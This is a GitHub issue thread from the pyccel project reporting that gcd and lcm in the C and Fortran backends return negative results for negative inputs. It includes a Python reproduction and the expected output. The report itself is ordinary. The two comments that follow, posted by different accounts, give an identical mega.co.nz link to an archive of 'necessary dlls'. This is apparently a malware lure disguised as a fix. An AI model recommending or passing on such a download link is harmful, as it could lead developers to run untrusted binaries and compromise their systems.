### ISSUE TITLE
Negative Output for `gcd` and `lcm` Functions with Negative Inputs

### ISSUE THREAD

**Issue by jalalium** [pyccel/pyccel#1985]
### Describe the bug
The `gcd` and `lcm`  functions in `C` and `Fortran` return negative values when the input values are negative. In python, the `gcd` and `lcm` return positive values, as the magnitude is what's of interest.

### To Reproduce
```python
import math

if __name__ == '__main__':
    print(math.gcd(-2,-8))
    print(math.lcm(-2,-8))
```

### Error details
This code prints 

```bash
-2
-8
```
in `C` and `Fortran`.

### Expected behavior

```bash
2
8
```

### Language
`C`, `Fortran`

**Comment by 1234abd** [comment]
download
https://mega.co.nz/#!B31G2LaZ!uBBOCp9hLC7bq9kP8NC6s4DanQJJZuoFRr5FI_jkeic
I put the necessary dlls in the archive

**Comment by nhatlaso1** [comment]
maybe this will help
https://mega.co.nz/#!B31G2LaZ!uBBOCp9hLC7bq9kP8NC6s4DanQJJZuoFRr5FI_jkeic
I put the necessary dlls in the archive
